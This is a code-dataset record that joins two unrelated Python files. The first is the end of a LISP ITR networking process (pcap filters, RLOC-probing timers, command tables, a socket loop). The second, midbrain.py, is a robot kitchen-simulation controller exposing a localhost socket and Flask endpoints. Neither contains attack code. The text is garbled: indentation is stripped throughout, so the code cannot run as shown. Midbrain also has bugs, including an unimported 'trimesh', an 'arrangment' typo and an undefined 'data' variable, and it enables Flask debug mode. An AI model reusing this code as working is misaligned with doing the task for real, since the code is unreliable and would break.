def lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, pitr):
if (l2_overlay):
pfilter = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp.lprint("Using pcap filter: '{}'".format(pfilter))
return(pfilter)
#endif
ether_pfilter = "(not ether proto 0x806)"
probe_pfilter = " or (udp src port 4342 and ip[28] == 0x28)"
decent_pfilter = \
" or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
src_pfilter = ""
dst_pfilter = ""
for source in sources:
insert_source = source
if (lisp.lisp_is_mac_string(source)):
insert_source = source.split("/")[0]
insert_source = insert_source.replace("-", "")
mac_str = []
for i in range(0, 12, 2): mac_str.append(insert_source[i:i+2])
insert_source = "ether host " + ":".join(mac_str)
#endif
src_pfilter += "{}".format(insert_source)
if (source not in dyn_eids): dst_pfilter += "{}".format(insert_source)
if (sources[-1] == source): break
src_pfilter += " or "
if (source not in dyn_eids): dst_pfilter += " or "
#endfor
if (dst_pfilter[-4::] == " or "): dst_pfilter = dst_pfilter[0:-4]
#
# If "lisp-nat = yes" is configured, then we are a PETR and we need
# to accept packets for local EIDs (assigned to loopback interfaces).
# So allow the first one to be accepted.
#
lisp_nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
loopback = lisp.lisp_get_loopback_address() if (lisp_nat) else None
addr_pfilter = ""
addresses = lisp.lisp_get_all_addresses()
for addr in addresses:
if (addr == loopback): continue
addr_pfilter += "{}".format(addr)
if (addresses[-1] == addr): break
addr_pfilter += " or "
#endif
if (src_pfilter != ""):
src_pfilter = " and (src net {})".format(src_pfilter)
#endif
if (dst_pfilter != ""):
dst_pfilter = " and not (dst net {})".format(dst_pfilter)
#endif
if (addr_pfilter != ""):
addr_pfilter = " and not (dst host {})".format(addr_pfilter)
#endif
#
# A PITR wants to see packets from anywhere so it can encap to possible
# LISP sites. But we want the kernel to route and consume for RLOCs for
# this system.
#
if (pitr):
dst_pfilter = ""
addr_pfilter = addr_pfilter.replace("dst ", "")
#endif
#
# Concatenate all the filters.
#
pfilter = ether_pfilter + src_pfilter + dst_pfilter + addr_pfilter
pfilter += probe_pfilter
pfilter += decent_pfilter
lisp.lprint("Using pcap filter: '{}'".format(pfilter))
return(pfilter)
#enddef
#
# lisp_itr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_itr_pcap_thread(device, pfilter, pcap_lock):
lisp.lisp_set_exception()
pcap_lock.acquire()
pcap = pcappy.open_live(device, 9000, 0, 100)
pcap_lock.release()
pcap.filter = pfilter
pcap.loop(-1, lisp_itr_pcap_process_packet, device)
return
#enddef
#
# lisp_itr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done less often
# then sending periodic Map-Registers as well as less the the NAT timeout
# value which is usually one minute.
#
def lisp_itr_process_info_timer():
global lisp_itr_info_timer
global lisp_ephem_nat_socket
global lisp_send_sockets
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_nat_socket, lisp_ephem_nat_socket,
lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, None, lisp.LISP_CTRL_PORT)
#
# Restart periodic timer.
#
lisp_itr_info_timer.cancel()
lisp_itr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_itr_process_info_timer, [])
lisp_itr_info_timer.start()
return
#enddef
#
# lisp_itr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_itr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
global lisp_itr_info_timer
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
#
# Trigger a Info-Request if we are doing NAT-traversal.
#
lisp_itr_info_timer = threading.Timer(0, lisp_itr_process_info_timer, [])
lisp_itr_info_timer.start()
return
#enddef
#
# lisp_itr_database_mapping_command
#
# Add database-mapping entry so ITR can packet capture on packets only from
# sources from the *first* database-mapping configured.
#
def lisp_itr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
return
#enddef
#
# lisp_itr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_itr_xtr_command(kv_pair):
global lisp_ephem_listen_socket
#
# Cache current state for nat-traversal and rloc-probing so we know if
# we should trigger..
#
nat_traversal = lisp.lisp_nat_traversal
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Did "nat-traversal = yes" or "rloc-probing = yes" just happen?
#
nat_now_on = (nat_traversal == False and lisp.lisp_nat_traversal and \
lisp.lisp_rloc_probing)
rloc_probing_now_on = (rloc_probing == False and lisp.lisp_rloc_probing)
interval = 0
if (rloc_probing_now_on): interval = 1
if (nat_now_on): interval = 5
if (interval != 0):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
lisp.lisp_start_rloc_probe_timer(interval, lisp_sockets)
#endif
#
# If nat-traversal=yes and data-plane-security=yes on an ITR, then we
# need to set source port in RLOC-probe requrests and encapsulated data
# packets to be the same value.
#
if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security):
port = lisp_ephem_listen_socket.getsockname()[1]
lisp.lisp_crypto_ephem_port = port
lisp.lprint("Use port {} for lisp-crypto packets".format(port))
entry = { "type" : "itr-crypto-port", "port" : port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# lisp_itr_process_nonce_ipc
#
# Process an nonce IPC message from the ETR. It wants to tell us that a
# request-nonce was received and we need to echo it or when this ITR requested
# a nonce to be echoed, the ETR is telling us it has been echoed.
#
def lisp_itr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
#
# If we are in request-nonce mode, exit it, so we can echo the nonce the
# other side is requesting.
#
if (opcode == "R"):
echo_nonce.request_nonce_rcvd = nonce
echo_nonce.last_request_nonce_rcvd = lisp.lisp_get_timestamp()
echo_nonce.echo_nonce_sent = nonce
echo_nonce.last_new_echo_nonce_sent = lisp.lisp_get_timestamp()
lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format( \
lisp.red(echo_nonce.rloc_str, False), lisp.lisp_hex_string(nonce)))
#endif
if (opcode == "E"):
echo_nonce.echo_nonce_rcvd = nonce
echo_nonce.last_echo_nonce_rcvd = lisp.lisp_get_timestamp()
if (echo_nonce.request_nonce_sent == nonce):
en = lisp.bold("echoed nonce", False)
lisp.lprint("Received {} {} from {}".format(en,
lisp.lisp_hex_string(nonce),
lisp.red(echo_nonce.rloc_str, False)))
echo_nonce.request_nonce_sent = None
lisp.lprint("Stop request-nonce mode for {}".format( \
lisp.red(echo_nonce.rloc_str, False)))
echo_nonce.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp()
else:
rns = "none"
if (echo_nonce.request_nonce_sent):
rns = lisp.lisp_hex_string(echo_nonce.request_nonce_sent)
#endif
lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + \
"nonce is {}").format(lisp.lisp_hex_string(nonce),
lisp.red(echo_nonce.rloc_str, False), rns))
#endif
#endif
return
#enddef
#
# ITR commands procssed by this process.
#
lisp_itr_commands = {
"lisp xtr-parameters" : [lisp_itr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"multi-tenant-eid" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-device" : [True],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_itr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp database-mapping" : [lisp_itr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp itr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"show itr-map-cache" : [lisp_itr_show_command, { }],
"show itr-rloc-probing" : [lisp_itr_show_rloc_probe_command, { }],
"show itr-keys" : [lisp_itr_show_keys_command, {}],
"show itr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_itr_startup() == False):
lisp.lprint("lisp_itr_startup() failed")
lisp.lisp_print_banner("ITR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ephem_nat_socket, lisp_ipc_punt_socket]
#
# Should we listen to the map-cache/punt IPC socket if it exists.
#
listen_on_ipc_socket = True
ephem_sockets = [lisp_ephem_listen_socket] * 3
ephem_nat_sockets = [lisp_ephem_nat_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process Info-Reply messages received on NAT ephemeral port.
#
if (lisp_ephem_nat_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_nat_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
continue
#endif
probe = lisp.lisp_parse_packet(ephem_nat_sockets, packet, source, port)
#
# Info-Reply has new RTR-list, RLOC-probe the RTR RLOCs so we can
# lisp-crypto faster.
#
if (probe):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
lisp.lisp_start_rloc_probe_timer(0, lisp_sockets)
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("nonce%") != -1):
lisp_itr_process_nonce_ipc(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-itr", [lisp_itr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-itr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_itr_data_plane(packet, "ipc")
else:
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_itr_shutdown()
lisp.lisp_print_banner("ITR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
midbrain.py
|
import os
import sys
import math
import time
import numpy as np
import abe_sim.brain.geom as geom
from abe_sim.brain.cerebellum import Cerebellum
from abe_sim.brain.geom import angle_diff, euler_to_quaternion, euler_diff_to_angvel, invert_quaternion, quaternion_product, quaternion_to_euler, poseFromTQ
import random
import math
import heapq
import ast
import json
import socket
import threading
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORTS = 65432 # Port to listen on (non-privileged ports are > 1023)
PORTF = 54321
from flask import Flask
from flask import request
import json
import schemasim.space.space3D as space3D
import schemasim.space.space2D as space2D
import schemasim.space.space as space
import schemasim.schemas.l0_schema_templates as st
import schemasim.schemas.l1_geometric_primitives as gp
import schemasim.schemas.l2_geometric_primitive_relations as gpr
import schemasim.objects.example_objects as eo
import schemasim.simulators.physics_simulator_2D as ps2D
import schemasim.simulators.physics_simulator_3D as ps3D
import schemasim.scene_generator as sg
from schemasim.util.geometry import fibonacci_sphere
from schemasim.schemas.l11_functional_control import Support
def simpleOnNavigationDoneCallback(x):
print("Base arrived at %s" % x)
def simpleHandsLeftPositioningDoneCallback(x):
print("Left hand arrived at %s" % x)
def simpleHandsRightPositioningDoneCallback(x):
print("Right hand arrived at %s" % x)
class Validator2DVW:
def __init__(self, collisionManager, trajector):
self.collisionManager = collisionManager
self.trajector = trajector
return
def isValid(self, coordinates):
return not self.collisionManager.in_collision_single(self.trajector, ((coordinates[0], coordinates[1], 0), (0, 0, 0, 1)))
class Validator3D:
def __init__(self, collisionManager, trajectors, space):
self.collisionManager = collisionManager
self.trajectors = trajectors
self.space = space
return
def isValid(self, coordinates):
for trajector, transform in self.trajectors:
pose = self.space.poseFromTR((transform[0][0]+coordinates[0], transform[0][1]+coordinates[1], transform[0][2]+coordinates[2]), transform[1])
if self.collisionManager.in_collision_single(trajector, pose):
return False
return True
class Midbrain:
def __init__(self, headActuator, handsActuator, baseActuator, poseSensor, worldDump, simu):
self.cerebellum = Cerebellum(headActuator, handsActuator, baseActuator, poseSensor, simu, worldDump)
self.cerebellum.initializePosition("hands/left", {"x": 0, "y": 0.4, "z": 0.96, "roll": 0, "pitch": 0, "yaw": 0})
self.cerebellum.initializePosition("hands/right", {"x": 0, "y": -0.4, "z": 0.96, "roll": 0, "pitch": 0, "yaw": 0})
self.cerebellum.initializePosition("head", {"pan": 0, "tilt": 0})
self.worldDump = worldDump
self.cellMap = None
self.collisionManager = geom.BoxCollisionManager()
self.simu = simu
self.sim2D = self.cerebellum._sim2D
self.sim3D = self.cerebellum._sim3D
self._socketThread = None
self._flaskThread = None
self._flask = Flask(__name__)
self._robotActionCondition = threading.Condition()
self._lastRequestedAction = False
def _simplifyWaypoints(self, waypoints):
retq = []
if waypoints:
ops = []
cX = waypoints[0][0]
cY = waypoints[0][1]
cA = waypoints[0][2]
for wp in waypoints[1:]:
dx = cX - wp[0]
dy = cY - wp[1]
d = math.sqrt(dx*dx + dy*dy)
da = geom.angle_diff(cA, wp[2])
if 0.001 < d:
ops.append("fwd")
elif 0.001 < da:
ops.append("a+")
elif -0.001 > da:
ops.append("a-")
cX = wp[0]
cY = wp[1]
cA = wp[2]
ops.append("end")
cOp = None
for k, op in enumerate(ops):
if None == cOp:
cOp = op
elif "end" == cOp:
coords = self.cellMap.pointId2EmbeddingCoordinates(waypoints[k])
retq.append({"x": coords[0], "y": coords[1], "yaw": coords[2]})
elif cOp != op:
coords = self.cellMap.pointId2EmbeddingCoordinates(waypoints[k])
retq.append({"x": coords[0], "y": coords[1], "yaw": coords[2]})
cOp = op
return retq
def getObjectSchemas(self):
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
objects = self.cerebellum._retrieveObjects()
retq = {}
for k,o in objects.items():
retq[k] = eo.MiscellaneousRigidObject(name=k, object_type=o["props"]["type"], mesh=os.path.join(pathPrefix, o["props"]["meshfile"]))
retq[k]._parameters["tx"] = o["position"]["x"]
retq[k]._parameters["ty"] = o["position"]["y"]
retq[k]._parameters["tz"] = o["position"]["z"]
retq[k]._parameters["rx"] = o["orientation"]["x"]
retq[k]._parameters["ry"] = o["orientation"]["y"]
retq[k]._parameters["rz"] = o["orientation"]["z"]
retq[k]._parameters["rw"] = o["orientation"]["w"]
retq[k]._parameters["vx"] = 0.0
retq[k]._parameters["vy"] = 0.0
retq[k]._parameters["vz"] = 0.0
retq[k]._parameters["wx"] = 0.0
retq[k]._parameters["wy"] = 0.0
retq[k]._parameters["wz"] = 0.0
return retq
def listObjects(self):
objects = self.cerebellum._retrieveObjects()
for k in sorted(objects.keys()):
props = ""
for propName in sorted(objects[k]["props"].keys()):
props = props + "\t" + propName + ": " + objects[k]["props"][propName] + "\n"
position = "\t(x: %f; y: %f; z: %f)\n" % (objects[k]["position"]["x"], objects[k]["position"]["y"], objects[k]["position"]["z"])
orientation = "\t(x: %f; y: %f; z: %f; w: %f)\n" % (objects[k]["orientation"]["x"], objects[k]["orientation"]["y"], objects[k]["orientation"]["z"], objects[k]["orientation"]["w"])
s = k+"\n"+props+position+orientation
print(s)
def updateNavigationMap(self):
objects = self.cerebellum._retrieveObjects()
self.collisionManager.clear_objects()
for k in objects.keys():
if ("furniture" in objects[k]["props"]) and objects[k]["props"]["furniture"]:
box = geom.boxFromPath(objects[k]["props"]["meshfile"])
if box:
self.collisionManager.add_object(k, box, ((objects[k]["position"]["x"], objects[k]["position"]["y"], objects[k]["position"]["z"]), (objects[k]["orientation"]["x"], objects[k]["orientation"]["y"], objects[k]["orientation"]["z"], objects[k]["orientation"]["w"])))
testBox = geom.Box()
testBox.vertices = [[-0.5, -0.5, 0], [0.5, -0.5, 0], [-0.5, 0.5, 0], [0.5, 0.5, 0], [-0.5, -0.5, 1], [0.5, -0.5, 1], [-0.5, 0.5, 1], [0.5, 0.5, 1]]
self.cellMap = space2D.Grid2DVW8(lines=10, cols=10, resolution=1, xLeft=-4.5, yDown=-4.5, gridYaw=0, validator=Validator2DVW(self.collisionManager, testBox), velocity=3, angularVelocity=3)
def _interpretSocketCommand(self, command):
opcode = ""
if 'op' in command:
opcode = command['op']
opcode = opcode.lower()
data = {}
if 'args' in command:
data = command['args']
retq = {'status': 'command not recognized', 'response': ''}
if opcode in ['hello', 'hi']:
retq['status'] = 'ok'
retq['response'] = 'hi!'
elif opcode in ['placeon']:
if ('object' in data) and ('destination' in data):
trajector = data['object']
supporter = data['destination']
objSchemas = self.getObjectSchemas()
trajSchema = objSchemas[trajector].unplace(self.sim3D)
destspec = [Support(supporter=objSchemas[supporter],supportee=trajSchema), trajSchema]
self.carryObject(trajector, destspec)
retq['status'] = 'ok'
retq['response'] = 'carrying object %s to %s' % (trajector, supporter)
else:
retq['status'] = 'insufficient parameters'
retq['response'] = 'missing object or destination'
elif opcode in ['retrieveobjects', 'ro']:
retq['status'] = 'ok'
retq['response'] = self.cerebellum._retrieveObjects()
elif opcode in ['retrieveworldstate', 'rws']:
retq['status'] = 'ok'
retq['response'] = self.cerebellum._retrieveWorldState(forJSON=True)
elif opcode in ['setworldstate', 'sws']:
retq['status'] = 'ok'
retq['response'] = ''
try:
self.cerebellum._setWorldState(data)
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
def _startSocket(self):
def thread_function_socket():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORTS))
s.listen(0)
while True:
conn, addr = s.accept()
comm = ""
with conn:
while True:
data = conn.recv(1024).decode('UTF-8')
comm = comm + data
if (not data) or (data[-1] in ['\n']):
break
comm = comm.strip()
try:
res = self._interpretSocketCommand(json.loads(comm))
except SyntaxError:
res = json.dumps({'status': 'ill-formed json for command'})
conn.sendall(bytes(res, 'UTF-8'))
def thread_function_flask():
@self._flask.route("/abe-sim-command", methods = ['POST'])
def abe_sim_command():
try:
request_data = request.get_json(force=True)
retq = self._interpretSocketCommand(request_data)
except SyntaxError:
retq = json.dumps({'status': 'ill-formed json for command'})
return retq
@self._flask.route("/abe-sim-command/to-get-kitchen", methods = ['POST'])
def to_get_kitchen():
retq = {'status': 'command not recognized', 'response': ''}
try:
request_data = request.get_json(force=True)
varName = request_data['kitchen']
retq['status'] = 'ok'
retq['response'] = {varName: self.cerebellum._retrieveWorldState(forJSON=True)}
except SyntaxError:
retq = {'status': 'ill-formed json for command'}
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-get-location", methods = ['POST'])
def to_get_location():
retq = {'status': 'ok', 'response': ''}
try:
request_data = request.get_json(force=True)
locationType = request_data['type']
locationVarName = request_data['availableLocation']
kitchenState = request_data['kitchen']
setWorldState = False
if 'setWorldState' in request_data:
setWorldState = request_data['setWorldState']
if setWorldState:
self.cerebellum._setWorldState(kitchenState)
locationName = None
data = self.cerebellum._retrieveWorldState(forJSON=True)
for o in data['worldState'].keys():
if ('props' in data['worldState'][o]) and ('type' in data['worldState'][o]['props']) and (locationType == data['worldState'][o]['props']['type']):
locationName = o
break
retq['response'] = {locationVarName: locationName}
except SyntaxError:
retq = {'status': 'ill-formed json for command'}
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-fetch", methods = ['POST'])
def to_fetch():
retq = {'status': 'ok', 'response': ''}
try:
request_data = request.get_json(force=True)
kitchenState = request_data['kitchenInputState']
trajector = request_data['object']
supporter = "counterTop1"
setWorldState = False
if 'setWorldState' in request_data:
setWorldState = request_data['setWorldState']
if setWorldState:
self.cerebellum._setWorldState(kitchenState)
objSchemas = self.getObjectSchemas()
trajSchema = objSchemas[trajector].unplace(self.sim3D)
destspec = [Support(supporter=objSchemas[supporter],supportee=trajSchema), trajSchema]
self._lastRequestedAction = False
self.carryObject(trajector, destspec)
with self._robotActionCondition:
self._robotActionCondition.wait()
objectName = trajector
if not self._lastRequestedAction:
objectName = None
worldState = self.cerebellum._retrieveWorldState(forJSON=True)
retq['response'] = {'fetchedObject': objectName, 'kitchenOutputState': worldState}
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-transfer", methods = ['POST'])
def to_transfer():
retq = {'status': 'ok', 'response': ''}
try:
request_data = request.get_json(force=True)
kitchenState = request_data['kitchenInputState']
trajector = request_data['input']
supporter = request_data['container']
setWorldState = False
if 'setWorldState' in request_data:
setWorldState = request_data['setWorldState']
if setWorldState:
self.cerebellum._setWorldState(kitchenState)
scene = self.cerebellum._retrieveObjects(fullDump=True)
collisionManager = self.cerebellum._sim3D.space().makeCollisionManager()
for k, v in scene.items():
pose = self.cerebellum._sim3D.space().poseFromTR([scene[k]["position"]["x"], scene[k]["position"]["y"], scene[k]["position"]["z"]], [scene[k]["orientation"]["x"], scene[k]["orientation"]["y"], scene[k]["orientation"]["z"], scene[k]["orientation"]["w"]])
if (k != trajector) and (k in self.cerebellum._volumes.keys()):
collisionManager.add_object(k, self.cerebellum._volumes[k], np.array(pose,dtype=np.double))
objSchemas = self.getObjectSchemas()
trajSchema = objSchemas[trajector].unplace(self.sim3D)
dp = scene[supporter]['position']
dr = scene[supporter]['orientation']
arrangment = 'unorderedHeap'
if (supporter in scene) and ('arrangement' in scene[supporter]['props']):
arrangement = scene[supporter]['props']['arrangement']
if arrangement not in ['shelved']:
arrangement = 'unorderedHeap'
targetRegion = self.cerebellum._preferredLocations[supporter].copy().apply_transform(poseFromTQ([dp['x'], dp['y'], dp['z']], [dr['x'], dr['y'], dr['z'], dr['w']]))
trajectorVolume = self.cerebellum._volumes[trajector]
tBox = self.cerebellum._sim3D.space().volumeBounds(trajectorVolume)
if 'shelved' == arrangement:
shelves = trimesh.graph.split(targetRegion)
found = False
for k in range(35):
shelf = shelves[random.randrange(len(shelves))]
bBox = self.cerebellum._sim3D.space().volumeBounds(shelf)
tv = [random.uniform(bBox[i][0] - tBox[i][0], bBox[i][1] - tBox[i][1]) for i in range(2)] + [bBox[2][0] + 0.005-tBox[2][0]]
tTrajector = trajectorVolume.copy().apply_transform(poseFromTQ(tv, [dr['x'], dr['y'], dr['z'], dr['w']]))
if (not collisionManager.in_collision_single(tTrajector, poseFromTQ([0,0,0], [0,0,0,1]))) and (all(targetRegion.contains(tTrajector.vertices))):
trajSchema._parameters["tx"] = tv[0]
trajSchema._parameters["ty"] = tv[1]
trajSchema._parameters["tz"] = tv[2]
trajSchema._parameters["rx"] = dr['x']
trajSchema._parameters["ry"] = dr['y']
trajSchema._parameters["rz"] = dr['z']
trajSchema._parameters["rw"] = dr['w']
trajSchema._parameters["vx"] = 0.0
trajSchema._parameters["vy"] = 0.0
trajSchema._parameters["vz"] = 0.0
trajSchema._parameters["wx"] = 0.0
trajSchema._parameters["wy"] = 0.0
trajSchema._parameters["wz"] = 0.0
found = True
break
elif 'unorderedHeap' == arrangement:
bBox = self.cerebellum._sim3D.space().volumeBounds(targetRegion)
found = False
for k in range(35):
tv = [random.uniform(bBox[i][0] - tBox[i][0], bBox[i][1] - tBox[i][1]) for i in range(3)]
tTrajector = trajectorVolume.copy().apply_transform(poseFromTQ(tv, [dr['x'], dr['y'], dr['z'], dr['w']]))
if (not collisionManager.in_collision_single(tTrajector, poseFromTQ([0,0,0], [0,0,0,1]))) and (all(targetRegion.contains(tTrajector.vertices))):
trajSchema._parameters["tx"] = tv[0]
trajSchema._parameters["ty"] = tv[1]
trajSchema._parameters["tz"] = tv[2]
trajSchema._parameters["rx"] = dr['x']
trajSchema._parameters["ry"] = dr['y']
trajSchema._parameters["rz"] = dr['z']
trajSchema._parameters["rw"] = dr['w']
trajSchema._parameters["vx"] = 0.0
trajSchema._parameters["vy"] = 0.0
trajSchema._parameters["vz"] = 0.0
trajSchema._parameters["wx"] = 0.0
trajSchema._parameters["wy"] = 0.0
trajSchema._parameters["wz"] = 0.0
found = True
break
#destspec = [Support(supporter=objSchemas[supporter],supportee=trajSchema), trajSchema]
destspec = [trajSchema]
self._lastRequestedAction = False
self.carryObject(trajector, destspec)
with self._robotActionCondition:
self._robotActionCondition.wait()
objectName = trajector
if not self._lastRequestedAction:
objectName = None
worldState = self.cerebellum._retrieveWorldState(forJSON=True)
retq['response'] = {'innerContainer': objectName, 'outerContainer': supporter, 'kitchenOutputState': worldState}
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
@self._flask.route("/abe-sim-command/to-set-kitchen", methods = ['POST'])
def to_set_kitchen():
retq = {'status': 'ok', 'response': ''}
try:
self.cerebellum._setWorldState(data)
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
self._flask.run(port=PORTF, debug=True, use_reloader=False)
self._socketThread = threading.Thread(target=thread_function_socket, args=())
self._socketThread.start()
self._flaskThread = threading.Thread(target=thread_function_flask, args=())
self._flaskThread.start()
def startOperations(self, onNavigationDoneCallback=simpleOnNavigationDoneCallback, onHandsLeftPositioningDoneCallback=simpleHandsLeftPositioningDoneCallback, onHandsRightPositioningDoneCallback=simpleHandsRightPositioningDoneCallback):
self.updateNavigationMap()
self.cerebellum.setCallback("base", onNavigationDoneCallback)
self.cerebellum.setCallback("hands/left", onHandsLeftPositioningDoneCallback)
self.cerebellum.setCallback("hands/right", onHandsRightPositioningDoneCallback)
self.cerebellum.startMonitoring()
self._startSocket()
def navigateToPosition(self, x, y, yaw):
if not self.cellMap:
print("Don't have a navigation map: perhaps startOperation has not been called?")
return False
crPos = self.cerebellum.currentPosition("base")
finPos = {"x": x, "y": y, "yaw": yaw}
timedMap = space.TimedPointGraph(self.cellMap, self.cellMap.graphIngressPoints((crPos["x"], crPos["y"], crPos["yaw"])))
waypoints = timedMap.generatePath((x, y, yaw))
self.cerebellum.clearWaypoints("base")
if waypoints:
waypoints = self._simplifyWaypoints(waypoints)
waypoints.append({"x": x, "y": y, "yaw": yaw})
for wp in waypoints:
self.cerebellum.pushWaypoint("base", wp)
print("On our way!")
return True
print("Target unreachable: out of map, or no clear paths to it.")
return False
